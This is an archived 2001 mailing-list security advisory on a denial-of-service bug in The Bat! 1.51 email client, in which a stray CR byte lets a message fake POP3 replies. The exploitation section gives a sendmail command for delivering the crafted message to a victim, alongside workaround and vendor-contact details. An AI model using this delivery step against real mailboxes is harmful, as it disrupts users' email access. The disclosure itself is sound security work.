OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: 3APA3A (3APA3ASECURITY.NNOV.RU)
Date: Wed Apr 18 2001 - 08:04:56 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    There is more fun then security impact in this issue, but it's a kind
    of DoS and can give a lot of headache to postmasters.

    =-------8<----------------------------------

    SECURITY.NNOV URL: http://www.security.nnov.ru
    Topic: The Bat! <cr> bug
    Application: The Bat! 1.51 (latest)
    Vendor: RitLabs
    Category: Denial of Service
    Risk Factor: Low
    Remote: Yes
    Vendor Contacted: 13.04.2001
    Software URL: http://www.thebat.net
    Vendor URL: http://www.ritlabs.com

    +Introduction:

     The Bat! Is very convenient commercially available MUA for Windows
     with lot of features.

    +Details:

     While RETRiving message via POP3 (IMAP isn't tested) The Bat!
     incorrectly processes 0x0D (CR) character if it's not followed by
     0x0A (LF). The Bat! incorrectly calculates end of the message and the
     part of message is treated as reply from POP3 server. The Bat! fails
     to receive the rest of the messages and fails to delete received
     messages from server. This leads to DoS against user's POP3 account.
     Malformed message can emulate any POP3 server replies.

    +Exploitation:

     Extract attached "badmessage" and send it, e.g. using

       cat badmessage | sendmail -U victimsomewhere.net

     or copy it to user's mailbox.
     This message causes The Bat! to show something like:

       !13.04.2001, 17:51:01: FETCH - Server reports error. The response is: --ERR Wrong User: replace user with your system administrator--

     message is crafted to do not contain this text somewhere in the body.

    +Workaround:

     use "Dispatch Mail on Server" feature to delete malformed message
     from server or use different MUA.

    +Solution:

     No yet.

    +Vendor:

     RitLabs was contacted on April, 13 (happy Easter to you, guys). No
     feedback yet.

    This advisory is being provided to you under RFPolicy v.2 documented
    at http://www.wiretrip.net/rfp/policy.html.

    --
    http://www.security.nnov.ru
             /\_/\
            { . . }     |\
    +--oQQo->{ ^ }<-----+ \
    |  3APA3A  U  3APA3A   }
    +-------------o66o--+ /
                        |/
    You know my name - look up my number (The Beatles)